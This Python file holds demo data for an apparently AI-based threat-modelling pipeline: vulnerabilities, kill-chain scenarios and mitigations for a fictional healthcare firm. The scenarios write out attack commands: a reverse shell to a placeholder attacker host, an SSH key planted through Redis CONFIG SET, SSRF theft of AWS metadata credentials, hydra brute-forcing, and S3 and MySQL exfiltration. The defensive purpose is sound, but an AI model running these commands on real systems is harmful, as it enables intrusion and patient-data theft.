"""
Données de démo pré-construites — correspond à l'analyse MediConnect du rapport écrit.
Utilisées avec le flag --demo pour valider le pipeline sans aucun appel LLM ni API.
"""

DEMO_LLM_REPORT = {
    "components_identified": [
        "Nginx 1.18", "PHP Laravel 8.x", "API REST JWT HS256",
        "Admin Interface /admin", "Mirth Connect 4.4.0",
        "Python Pickle Service", "wkhtmltopdf 0.12.5",
        "MySQL 5.7", "Redis 6.0", "AWS S3", "SSH Server",
    ],
    "attack_surface": {
        "internet_exposed": [
            "Nginx 1.18 (ports 80, 443)",
            "PHP Laravel 8.x",
            "API REST /api/v1",
            "Admin Interface /admin",
            "SSH Server (port 22)",
            "Mirth Connect 4.4.0 (via reverse proxy, port 8080)",
        ],
        "internal_only": [
            "MySQL 5.7 (port 3306)",
            "Redis 6.0 (port 6379)",
            "Python Pickle Notification Service",
            "Spring Boot Rules Engine",
            "wkhtmltopdf 0.12.5",
        ],
        "critical_paths": [
            "Internet -> Nginx -> Mirth Connect 4.4.0 (CVE-2023-43208) -> RCE -> Flat network -> All internal services",
            "Internet -> Laravel /api -> wkhtmltopdf SSRF -> AWS metadata -> S3 exfiltration",
            "Flat network (post-breach) -> Redis 6379 (no auth) -> CONFIG SET -> root SSH",
            "Internet -> /admin HTTP Basic Auth -> brute-force -> full admin access",
        ],
    },
    "vulnerabilities": [
        {
            "id": "VULN-001",
            "component": "Mirth Connect 4.4.0",
            "type": "RCE",
            "severity": "CRITICAL",
            "cve_id": "CVE-2023-43208",
            "cwe_id": "CWE-502",
            "cvss_score": 9.8,
            "description": "Mirth Connect <= 4.4.0 allows unauthenticated remote code execution via Java XStream deserialisation. The /api endpoint processes user-controlled XML without sanitisation, granting the attacker OS-level execution as the Mirth process user.",
            "attack_vector": "POST /api HTTP/1.1 with crafted XStream XML payload -> arbitrary command execution. No credentials required. Port 8080 exposed via reverse proxy.",
            "evidence": "Mirth Connect 4.4.0 listed as DMZ component, version explicitly stated, exposed via reverse proxy from internet (port 8080). Misconfiguration entry: 'CVE-2023-43208: unauthenticated RCE via Java XStream deserialisation'.",
            "confidence_score": 0.97,
            "reliability_score": 100,
        },
        {
            "id": "VULN-002",
            "component": "Redis 6.0 (no authentication)",
            "type": "MiscConfig",
            "severity": "CRITICAL",
            "cve_id": None,
            "cwe_id": "CWE-306",
            "cvss_score": 10.0,
            "description": "Redis has no requirepass set. On a flat network, any compromised host can connect on port 6379. CONFIG SET allows writing arbitrary files to the filesystem — crontab injection, authorized_keys implant, or webshell creation are all trivial.",
            "attack_vector": "redis-cli -h <target> CONFIG SET dir /root/.ssh; CONFIG SET dbfilename authorized_keys; SET x '<pubkey>'; BGSAVE -> SSH as root.",
            "evidence": "Component named 'Redis 6.0 (no authentication)' — no-auth state explicit in name. Misconfiguration: 'No authentication — requirepass not set (CWE-306)'. Port 6379 accessible on flat network.",
            "confidence_score": 0.99,
            "reliability_score": 100,
        },
        {
            "id": "VULN-003",
            "component": "Python Pickle Notification Service",
            "type": "Deserialisation",
            "severity": "CRITICAL",
            "cve_id": None,
            "cwe_id": "CWE-502",
            "cvss_score": 9.0,
            "description": "Python's pickle module executes arbitrary code on deserialisation. If an attacker controls the data sent to this service (post-initial-access on the flat network), a trivial pickle payload triggers immediate RCE.",
            "attack_vector": "Inject crafted pickle payload via compromised network path -> OS command execution as Python service process user.",
            "evidence": "Component uses Python 3.8 + pickle. Misconfiguration: 'Insecure deserialisation via pickle (CWE-502) — arbitrary code execution on crafted payload'. Service reachable on flat network.",
            "confidence_score": 0.88,
            "reliability_score": 100,
        },
        {
            "id": "VULN-004",
            "component": "wkhtmltopdf 0.12.5",
            "type": "SSRF",
            "severity": "HIGH",
            "cve_id": "CVE-2022-35583",
            "cwe_id": "CWE-918",
            "cvss_score": 9.8,
            "description": "wkhtmltopdf 0.12.5 follows HTTP redirects including to internal resources. An attacker who controls the URL passed to the PDF generator can exfiltrate AWS EC2 instance metadata, internal service responses, and files via file:// handler.",
            "attack_vector": "Submit PDF generation request with URL http://169.254.169.254/latest/meta-data/iam/security-credentials/ -> read AWS IAM role credentials.",
            "evidence": "wkhtmltopdf 0.12.5 version explicitly stated. Misconfiguration: 'CVE-2022-35583: SSRF — can fetch internal metadata / files via crafted HTML'.",
            "confidence_score": 0.93,
            "reliability_score": 80,
        },
        {
            "id": "VULN-005",
            "component": "MySQL 5.7",
            "type": "WeakCrypto",
            "severity": "HIGH",
            "cve_id": None,
            "cwe_id": "CWE-522",
            "cvss_score": 7.5,
            "description": "Database credentials (app_user / App2023!) stored in plaintext .env file. Password is trivially guessable. Any LFI, path traversal, or .env exposure leaks direct database access to all patient medical records.",
            "attack_vector": "Read .env via LFI on Laravel -> extract DB credentials -> mysql -u app_user -pApp2023! -h <db_host> mediconnect.",
            "evidence": "MySQL 5.7 misconfiguration: 'Credentials stored in plaintext .env (user: app_user, pwd: App2023!)' and 'Weak password (CWE-521)'.",
            "confidence_score": 0.95,
            "reliability_score": 100,
        },
        {
            "id": "VULN-006",
            "component": "Admin Interface /admin",
            "type": "AuthBypass",
            "severity": "HIGH",
            "cve_id": None,
            "cwe_id": "CWE-308",
            "cvss_score": 8.1,
            "description": "HTTP Basic Authentication transmits credentials base64-encoded. Without rate limiting or WAF, a dictionary attack against /admin is feasible from the internet. TLS 1.2 only leaves weak cipher suites available.",
            "attack_vector": "hydra -l admin -P rockyou.txt https://<target>/admin -m Basic-Auth -> brute-force admin credentials.",
            "evidence": "Misconfigurations on Admin Interface: 'HTTP Basic Auth — credentials base64-encoded in transit', 'No MFA', 'No rate limiting'. Component exposed to internet.",
            "confidence_score": 0.90,
            "reliability_score": 100,
        },
        {
            "id": "VULN-007",
            "component": "API REST /api/v1 — JWT HS256",
            "type": "WeakCrypto",
            "severity": "HIGH",
            "cve_id": None,
            "cwe_id": "CWE-347",
            "cvss_score": 7.5,
            "description": "JWT tokens are signed with HS256 (symmetric HMAC). If the secret is weak or leaked (e.g., via .env exposure), an attacker can forge arbitrary tokens and impersonate any user including admin. Also vulnerable to algorithm confusion (none/RS256 to HS256).",
            "attack_vector": "Extract JWT secret from .env -> forge token with admin claims -> access any patient record via /api/v1/patients/<id>.",
            "evidence": "API component uses JWT HS256 (symmetric). Misconfiguration: 'JWT signed with HS256 (symmetric) — algorithm confusion risk (CWE-347)'.",
            "confidence_score": 0.85,
            "reliability_score": 100,
        },
        {
            "id": "VULN-008",
            "component": "SSH Server",
            "type": "MiscConfig",
            "severity": "MEDIUM",
            "cve_id": None,
            "cwe_id": "CWE-521",
            "cvss_score": 6.5,
            "description": "SSH exposes password authentication on port 22. Without fail2ban or rate limiting, automated brute-force against weak credentials is trivially feasible from the internet.",
            "attack_vector": "nmap -sV -p 22 <target> -> hydra -l root -P rockyou.txt ssh://<target> -> shell access.",
            "evidence": "SSH Server misconfigurations: 'PasswordAuthentication enabled — brute-force possible (CWE-521)', 'Port 22 exposed to internet without fail2ban or rate limiting'.",
            "confidence_score": 0.92,
            "reliability_score": 100,
        },
        {
            "id": "VULN-009",
            "component": "AWS S3 Storage",
            "type": "InfoDisclosure",
            "severity": "HIGH",
            "cve_id": None,
            "cwe_id": "CWE-284",
            "cvss_score": 7.5,
            "description": "S3 bucket configured as public read. AWS IAM credentials are stored in the .env file on the web server. Combined, these allow unauthenticated data exfiltration of all stored files and further AWS service access.",
            "attack_vector": "Read .env (LFI or SSRF) -> AWS_ACCESS_KEY_ID + AWS_SECRET_ACCESS_KEY -> aws s3 ls s3://mediconnect-backup-prod -> aws s3 sync s3://mediconnect-backup-prod /tmp/exfil.",
            "evidence": "AWS S3 misconfigurations: 'Bucket public in read — data exfiltration possible without authentication', 'IAM credentials stored in .env file'.",
            "confidence_score": 0.91,
            "reliability_score": 100,
        },
        {
            "id": "VULN-010",
            "component": "Nginx 1.18",
            "type": "MiscConfig",
            "severity": "MEDIUM",
            "cve_id": "CVE-2021-23017",
            "cwe_id": "CWE-193",
            "cvss_score": 7.7,
            "description": "Nginx 1.18 is affected by an off-by-one error in the DNS resolver. In configurations relying on dynamic upstream resolution, an attacker on a shared network can exploit this to potentially bypass resolver security checks.",
            "attack_vector": "DNS spoofing attack against Nginx resolver in environments using dynamic upstream backends.",
            "evidence": "Nginx 1.18 version explicitly stated. Misconfiguration: 'TLS 1.2 only — weak cipher suites possible'. CVE-2021-23017 applies to Nginx < 1.20.1.",
            "confidence_score": 0.75,
            "reliability_score": 80,
        },
        {
            "id": "VULN-011",
            "component": "MediConnect Corp (Infrastructure)",
            "type": "MiscConfig",
            "severity": "HIGH",
            "cve_id": None,
            "cwe_id": "CWE-778",
            "cvss_score": 7.0,
            "description": "No SIEM, no IDS/IPS, no WAF deployed. Logs are not centralised. An attacker can operate undetected for extended periods. Combined with the flat network (no segmentation), lateral movement is trivial and invisible.",
            "attack_vector": "Post-exploitation: move laterally to all internal services without triggering any alert; no detection capability exists.",
            "evidence": "Architecture description states flat network with no segmentation. No WAF, IDS, or SIEM mentioned anywhere in the component list.",
            "confidence_score": 0.98,
            "reliability_score": 100,
        },
    ],
    "risk_score": 95,
    "risk_score_rationale": (
        "Score de 95/100 justifié par la combinaison d'un RCE non authentifié (CVE-2023-43208, CVSS 9.8) "
        "avec un réseau plat sans segmentation — toute compromission initiale donne accès à l'ensemble de l'infrastructure. "
        "L'absence de SIEM et de WAF rend la détection impossible, transformant chaque vecteur en compromission totale."
    ),
    "summary": (
        "MediConnect Corp presents a critical security posture with a global risk score of 95/100. "
        "The architecture combines unauthenticated RCE (Mirth Connect CVE-2023-43208), an unprotected Redis instance "
        "enabling filesystem writes, and a flat network with no segmentation — any single vulnerability leads to full "
        "system compromise. The absence of SIEM, WAF, and IDS means attacks go undetected. "
        "Medical records are at immediate risk of exfiltration, constituting a critical GDPR/HIPAA violation."
    ),
    "filtered_count": 2,
}

DEMO_SCENARIOS = {
    "scenarios": [
        {
            "id": "SCENARIO-A",
            "title": "Full Compromise via Mirth Connect + Pickle Chain",
            "objective": "Root access + exfiltration of all medical records from MySQL and S3",
            "threat_actor": "Targeted",
            "entry_point_cve": "CVE-2023-43208",
            "entry_point_component": "Mirth Connect 4.4.0",
            "kill_chain": [
                {
                    "step": 1,
                    "phase": "Reconnaissance",
                    "technique_id": "T1046",
                    "technique_name": "Network Service Discovery",
                    "description": "Scan the target to discover Mirth Connect on port 8080 via reverse proxy",
                    "commands": ["nmap -sV -p 80,443,8080 <target>", "curl https://<target>/api/server/version"],
                    "tools": ["nmap", "curl"],
                    "iocs": ["TCP connection to port 8080", "HTTP GET /api/server/version in proxy logs"],
                },
                {
                    "step": 2,
                    "phase": "Initial Access",
                    "technique_id": "T1190",
                    "technique_name": "Exploit Public-Facing Application",
                    "description": "Exploit CVE-2023-43208: send crafted XStream XML payload to /api for unauthenticated RCE",
                    "commands": [
                        "python3 CVE-2023-43208.py -u https://<target> -c 'id'",
                        "python3 CVE-2023-43208.py -u https://<target> -c 'bash -i >& /dev/tcp/<attacker>/4444 0>&1'",
                    ],
                    "tools": ["CVE-2023-43208 PoC", "nc"],
                    "iocs": ["Malformed XML POST to /api", "Outbound TCP connection from Mirth server"],
                },
                {
                    "step": 3,
                    "phase": "Discovery",
                    "technique_id": "T1083",
                    "technique_name": "File and Directory Discovery",
                    "description": "Enumerate internal services on flat network; discover Pickle service and Redis",
                    "commands": ["cat /proc/net/tcp", "nmap -sn 172.16.0.0/24 --host-timeout 1s"],
                    "tools": ["nmap", "cat"],
                    "iocs": ["Internal network scans from Mirth server"],
                },
                {
                    "step": 4,
                    "phase": "Execution",
                    "technique_id": "T1059.006",
                    "technique_name": "Command & Scripting: Python",
                    "description": "Inject pickle payload into the internal Python notification service to gain RCE on that host",
                    "commands": [
                        "python3 -c \"import pickle,os,socket; payload=pickle.dumps({'cmd':'id'}); s=socket.connect(('pickle-svc',9000)); s.send(payload)\"",
                    ],
                    "tools": ["python3", "pickle"],
                    "iocs": ["Unusual pickle data arriving at notification service port"],
                },
                {
                    "step": 5,
                    "phase": "Credential Access",
                    "technique_id": "T1552.001",
                    "technique_name": "Credentials in Files",
                    "description": "Read .env to extract MySQL credentials and AWS IAM keys",
                    "commands": ["cat /var/www/html/.env"],
                    "tools": ["cat"],
                    "iocs": [".env file read access in audit logs (if auditd configured)"],
                },
                {
                    "step": 6,
                    "phase": "Exfiltration",
                    "technique_id": "T1537",
                    "technique_name": "Transfer Data to Cloud Account",
                    "description": "Use stolen AWS credentials to exfiltrate S3 bucket content",
                    "commands": [
                        "AWS_ACCESS_KEY_ID=<key> AWS_SECRET_ACCESS_KEY=<secret> aws s3 ls s3://mediconnect-backup-prod",
                        "aws s3 sync s3://mediconnect-backup-prod /tmp/exfil",
                    ],
                    "tools": ["aws-cli"],
                    "iocs": ["Unusual S3 ListBucket + GetObject calls from unknown IP"],
                },
            ],
            "prerequisites": ["Mirth Connect 4.4.0 accessible via reverse proxy", "Flat network (no segmentation)", "Python pickle service reachable internally"],
            "impact": "C:H I:H A:H — Full patient data breach, GDPR/HIPAA violation, total infrastructure compromise",
            "detection_difficulty": "LOW",
            "cves_used": ["CVE-2023-43208"],
            "dread_score": {"damage": 10, "reproducibility": 9, "exploitability": 8, "affected_users": 10, "discoverability": 8, "total": 9.0},
        },
        {
            "id": "SCENARIO-B",
            "title": "SSRF via wkhtmltopdf -> AWS Credentials Theft",
            "objective": "Access AWS metadata service and steal IAM credentials to exfiltrate S3 data",
            "threat_actor": "Targeted",
            "entry_point_cve": "CVE-2022-35583",
            "entry_point_component": "wkhtmltopdf 0.12.5",
            "kill_chain": [
                {
                    "step": 1,
                    "phase": "Reconnaissance",
                    "technique_id": "T1595",
                    "technique_name": "Active Scanning",
                    "description": "Discover PDF generation endpoint and test for SSRF",
                    "commands": ["curl -X POST https://<target>/api/v1/generate-pdf -d '{\"url\":\"http://169.254.169.254/\"}'"],
                    "tools": ["curl", "Burp Suite"],
                    "iocs": ["HTTP requests to PDF generation endpoint with unusual URLs"],
                },
                {
                    "step": 2,
                    "phase": "Initial Access",
                    "technique_id": "T1190",
                    "technique_name": "Exploit Public-Facing Application",
                    "description": "SSRF to AWS metadata service to retrieve IAM role credentials",
                    "commands": [
                        "curl -X POST https://<target>/api/v1/generate-pdf -d '{\"url\":\"http://169.254.169.254/latest/meta-data/iam/security-credentials/mediconnect-role\"}'",
                    ],
                    "tools": ["curl", "Burp Suite"],
                    "iocs": ["PDF generation with internal/metadata URL"],
                },
                {
                    "step": 3,
                    "phase": "Credential Access",
                    "technique_id": "T1552.005",
                    "technique_name": "Cloud Instance Metadata API",
                    "description": "Extract temporary AWS credentials from instance metadata response",
                    "commands": ["# Parse JSON response from PDF: AccessKeyId, SecretAccessKey, Token"],
                    "tools": ["jq", "curl"],
                    "iocs": ["GetCredentials API call in CloudTrail"],
                },
                {
                    "step": 4,
                    "phase": "Exfiltration",
                    "technique_id": "T1537",
                    "technique_name": "Transfer Data to Cloud Account",
                    "description": "Use stolen IAM credentials to exfiltrate all S3 bucket contents",
                    "commands": [
                        "export AWS_ACCESS_KEY_ID=<stolen> AWS_SECRET_ACCESS_KEY=<stolen> AWS_SESSION_TOKEN=<token>",
                        "aws s3 sync s3://mediconnect-backup-prod ./exfil/",
                    ],
                    "tools": ["aws-cli"],
                    "iocs": ["S3 sync from unknown external IP in CloudTrail", "Large data transfer in VPC flow logs"],
                },
            ],
            "prerequisites": ["PDF generation endpoint accessible", "Application running on EC2 with IAM role", "S3 bucket public or IAM role has S3 access"],
            "impact": "C:H I:L A:L — Full exfiltration of S3 stored files, potential pivot to other AWS services",
            "detection_difficulty": "MEDIUM",
            "cves_used": ["CVE-2022-35583"],
            "dread_score": {"damage": 7, "reproducibility": 8, "exploitability": 7, "affected_users": 8, "discoverability": 6, "total": 7.2},
        },
        {
            "id": "SCENARIO-C",
            "title": "Redis Unauthenticated -> Crontab Injection -> MySQL Pivot",
            "objective": "Persistent root access and lateral movement to MySQL database",
            "threat_actor": "Opportunist",
            "entry_point_cve": None,
            "entry_point_component": "Redis 6.0 (no authentication)",
            "kill_chain": [
                {
                    "step": 1,
                    "phase": "Reconnaissance",
                    "technique_id": "T1046",
                    "technique_name": "Network Service Discovery",
                    "description": "Discover Redis on port 6379 — no authentication banner",
                    "commands": ["nmap -sV -p 6379 <target>", "redis-cli -h <target> ping"],
                    "tools": ["nmap", "redis-cli"],
                    "iocs": ["TCP connection to port 6379", "PING/PONG exchange in network capture"],
                },
                {
                    "step": 2,
                    "phase": "Initial Access",
                    "technique_id": "T1190",
                    "technique_name": "Exploit Public-Facing Application",
                    "description": "Connect to Redis without any credentials — immediate access",
                    "commands": ["redis-cli -h <target>", "redis-cli -h <target> info server"],
                    "tools": ["redis-cli"],
                    "iocs": ["Redis connection from external/unexpected IP in redis.log"],
                },
                {
                    "step": 3,
                    "phase": "Persistence",
                    "technique_id": "T1098",
                    "technique_name": "Account Manipulation",
                    "description": "Use CONFIG SET to redirect Redis DB dump to /root/.ssh and inject attacker public key",
                    "commands": [
                        "redis-cli -h <target> CONFIG SET dir /root/.ssh",
                        "redis-cli -h <target> CONFIG SET dbfilename authorized_keys",
                        "redis-cli -h <target> SET x \"\\n\\nssh-rsa AAAA...attacker_pubkey...\\n\\n\"",
                        "redis-cli -h <target> BGSAVE",
                    ],
                    "tools": ["redis-cli"],
                    "iocs": ["CONFIG SET commands in redis.log", "authorized_keys file modified (auditd)"],
                },
                {
                    "step": 4,
                    "phase": "Lateral Movement",
                    "technique_id": "T1021.004",
                    "technique_name": "Remote Services: SSH",
                    "description": "SSH as root using injected public key",
                    "commands": ["ssh -i attacker_key root@<target>"],
                    "tools": ["ssh"],
                    "iocs": ["SSH login from unknown IP with public key auth in /var/log/auth.log"],
                },
                {
                    "step": 5,
                    "phase": "Collection",
                    "technique_id": "T1005",
                    "technique_name": "Data from Local System",
                    "description": "Read .env to get MySQL credentials, then dump entire patient database",
                    "commands": [
                        "cat /var/www/html/.env",
                        "mysql -u app_user -pApp2023! -h mysql mediconnect -e 'SELECT * FROM patients'",
                        "mysqldump -u app_user -pApp2023! -h mysql mediconnect > /tmp/dump.sql",
                    ],
                    "tools": ["cat", "mysql", "mysqldump"],
                    "iocs": ["mysqldump execution from unexpected host", "Large SQL query in MySQL general log"],
                },
            ],
            "prerequisites": ["Redis port 6379 reachable from attacker", "Redis running as root or with write access to /root/.ssh", "SSH enabled with key auth"],
            "impact": "C:H I:H A:H — Root persistence, full patient database exfiltration, GDPR breach",
            "detection_difficulty": "LOW",
            "cves_used": [],
            "dread_score": {"damage": 8, "reproducibility": 10, "exploitability": 10, "affected_users": 9, "discoverability": 9, "total": 9.2},
        },
    ]
}

DEMO_MITIGATIONS = {
    "mitigations": [
        {
            "vulnerability_id": "VULN-001",
            "title": "Patch Mirth Connect to version 4.4.1",
            "type": "Patch",
            "priority": "IMMEDIATE",
            "effort": "LOW",
            "description": "CVE-2023-43208 is patched in Mirth Connect 4.4.1. The unauthenticated RCE via XStream deserialisation est le vecteur de sévérité maximale de l'architecture.",
            "implementation_steps": [
                "1. Download Mirth Connect 4.4.1 from https://github.com/nextgenhealthcare/connect/releases",
                "2. Backup current configuration: cp -r /opt/mirth/conf /opt/mirth/conf.bak",
                "3. Stop service: sudo systemctl stop mirthconnect",
                "4. Run installer or replace JAR files per vendor upgrade guide",
                "5. Start service: sudo systemctl start mirthconnect",
                "6. Verify version: curl http://localhost:8080/api/server/version",
            ],
            "verification": "curl http://localhost:8080/api/server/version  # Must return 4.4.1 or higher",
            "references": ["CVE-2023-43208", "https://github.com/nextgenhealthcare/connect/releases"],
            "business_impact": "Requires maintenance window (~30 min downtime) — schedule during off-hours",
        },
        {
            "vulnerability_id": "VULN-002",
            "title": "Enable Redis authentication (requirepass)",
            "type": "Config",
            "priority": "IMMEDIATE",
            "effort": "LOW",
            "description": "Redis has no authentication. Adding a strong requirepass immediately blocks unauthenticated access and prevents CONFIG SET filesystem attacks.",
            "implementation_steps": [
                "1. Generate a strong password: openssl rand -hex 32",
                "2. Edit /etc/redis/redis.conf: add line 'requirepass <generated_password>'",
                "3. Also add 'bind 127.0.0.1 ::1' to restrict to localhost if no external access needed",
                "4. Restart Redis: sudo systemctl restart redis",
                "5. Update application .env: REDIS_PASSWORD=<generated_password>",
                "6. Restart web application to apply new Redis credentials",
            ],
            "verification": "redis-cli -a <password> ping  # Must return PONG;  redis-cli ping  # Must return NOAUTH Authentication required",
            "references": ["CWE-306", "https://redis.io/docs/management/security/"],
            "business_impact": "Application must be updated with password simultaneously — coordinate deployment",
        },
        {
            "vulnerability_id": "VULN-003",
            "title": "Replace pickle with a safe serialisation library",
            "type": "Architecture",
            "priority": "IMMEDIATE",
            "effort": "MEDIUM",
            "description": "Python pickle is fundamentally unsafe for untrusted data. Replace with JSON or msgpack for the notification service data format.",
            "implementation_steps": [
                "1. Audit all code using pickle.loads() / pickle.load()",
                "2. Replace with json.loads() for simple structures, or msgpack for binary efficiency",
                "3. If pickle is required internally, validate data with HMAC signature before deserialisation",
                "4. Add network-level ACL to restrict who can send data to the notification service port",
                "5. Run tests to verify notification service behaves identically",
            ],
            "verification": "grep -r 'pickle.loads\\|pickle.load' vuln_ai/ # Should return no results after refactor",
            "references": ["CWE-502", "https://docs.python.org/3/library/pickle.html#restricting-globals"],
            "business_impact": "Requires code changes — must be tested before deployment to production",
        },
        {
            "vulnerability_id": "VULN-004",
            "title": "Disable external requests in wkhtmltopdf + WAF rule",
            "type": "Config",
            "priority": "IMMEDIATE",
            "effort": "LOW",
            "description": "Prevent SSRF by blocking wkhtmltopdf from fetching internal/cloud metadata URLs.",
            "implementation_steps": [
                "1. Add --no-background --disable-external-links flags to wkhtmltopdf invocation",
                "2. Add --block-local-file-access to prevent file:// access",
                "3. Alternatively wrap wkhtmltopdf in a network namespace with no access to 169.254.0.0/16",
                "4. Add WAF rule blocking requests to PDF endpoint with URLs matching 169.254.x.x or internal RFC-1918 ranges",
                "5. Validate URL against allowlist before passing to wkhtmltopdf",
            ],
            "verification": "Submit PDF request with URL http://169.254.169.254/ — must receive 403 or no metadata in output",
            "references": ["CVE-2022-35583", "CWE-918", "https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html"],
            "business_impact": "Low — legitimate PDF generation from customer-controlled URLs should remain, just filtered",
        },
        {
            "vulnerability_id": "VULN-005",
            "title": "Rotate MySQL credentials and remove from .env",
            "type": "Config",
            "priority": "IMMEDIATE",
            "effort": "LOW",
            "description": "Credentials App2023! are trivially guessable and stored in plaintext. Rotate immediately and use a secrets manager.",
            "implementation_steps": [
                "1. Generate strong password: openssl rand -base64 24",
                "2. Rotate in MySQL: ALTER USER 'app_user'@'%' IDENTIFIED BY '<new_password>';",
                "3. Store credentials in AWS Secrets Manager or Vault — never in .env",
                "4. Update application to fetch credentials from secrets manager at runtime",
                "5. Rotate .env credentials for all other services (Redis, AWS keys)",
                "6. Add .env to .gitignore and scan git history for leaks: git log --all --full-history -- .env",
            ],
            "verification": "mysql -u app_user -pApp2023! -h <host>  # Must fail with Access denied after rotation",
            "references": ["CWE-522", "CWE-521", "https://owasp.org/www-project-top-ten/2021/A02_2021-Cryptographic_Failures/"],
            "business_impact": "Zero downtime if credentials rotated and application updated simultaneously",
        },
        {
            "vulnerability_id": "VULN-007",
            "title": "Migrate JWT signing from HS256 to RS256",
            "type": "Architecture",
            "priority": "SHORT_TERM",
            "effort": "MEDIUM",
            "description": "Replace symmetric HMAC (HS256) with asymmetric RSA (RS256). The private key signs tokens; the public key verifies — leaking the public key does not compromise token integrity.",
            "implementation_steps": [
                "1. Generate RSA key pair: openssl genrsa -out jwt_private.pem 2048 && openssl rsa -in jwt_private.pem -pubout -out jwt_public.pem",
                "2. Store private key in secrets manager",
                "3. Update JWT library configuration to use RS256 algorithm",
                "4. Deploy and test with new tokens",
                "5. Invalidate all existing HS256 tokens by incrementing a token version field",
                "6. Add algorithm: 'RS256' check explicitly in verification code to prevent algorithm confusion",
            ],
            "verification": "Attempt to forge a token with alg:none or alg:HS256 using public key — must be rejected",
            "references": ["CWE-347", "https://auth0.com/blog/rs256-vs-hs256-whats-the-difference/"],
            "business_impact": "All existing sessions invalidated during migration — plan a login-required deployment",
        },
        {
            "vulnerability_id": "VULN-008",
            "title": "Disable SSH password authentication + enable fail2ban",
            "type": "Config",
            "priority": "IMMEDIATE",
            "effort": "LOW",
            "description": "Remove password auth from SSH to block brute-force attacks. Require key-based authentication only.",
            "implementation_steps": [
                "1. Ensure all admins have SSH key pairs configured before disabling passwords",
                "2. Edit /etc/ssh/sshd_config: set PasswordAuthentication no",
                "3. Set PermitRootLogin prohibit-password (or no)",
                "4. Restart SSH: sudo systemctl restart sshd",
                "5. Install fail2ban: apt install fail2ban && systemctl enable fail2ban",
                "6. Configure /etc/fail2ban/jail.local: maxretry=3, bantime=3600 for sshd",
            ],
            "verification": "ssh -o PasswordAuthentication=yes user@<target>  # Must return 'Permission denied (publickey)'",
            "references": ["CWE-521", "https://www.ssh.com/academy/ssh/sshd_config"],
            "business_impact": "Zero business impact — key-based auth is standard; admins must have keys pre-configured",
        },
        {
            "vulnerability_id": "VULN-011",
            "title": "Deploy centralised logging (SIEM) + network segmentation",
            "type": "Architecture",
            "priority": "SHORT_TERM",
            "effort": "HIGH",
            "description": "The flat network and absent SIEM make detection impossible. Segment the network into DMZ/App/Data zones and deploy log aggregation.",
            "implementation_steps": [
                "1. Network segmentation: create VLANs or VPC subnets: DMZ (web), App (services), Data (DB/Redis)",
                "2. Firewall rules: Web -> App on specific ports only; App -> Data on specific ports only",
                "3. Deploy ELK Stack or Wazuh for log aggregation: apt install elasticsearch logstash kibana",
                "4. Configure log shipping from Nginx, application, SSH, Redis, MySQL to central SIEM",
                "5. Create SIEM rules: alert on port 6379 connections, CONFIG SET commands, SSH brute-force, unusual outbound connections",
                "6. Deploy a WAF (ModSecurity or AWS WAF) in front of web/API layer",
            ],
            "verification": "Simulate attack steps and verify SIEM alerts fire within 60 seconds; verify Redis port 6379 unreachable from DMZ",
            "references": ["https://www.elastic.co/siem", "https://wazuh.com/"],
            "business_impact": "Major infrastructure change — plan in sprints; network segmentation requires maintenance window",
        },
    ]
}
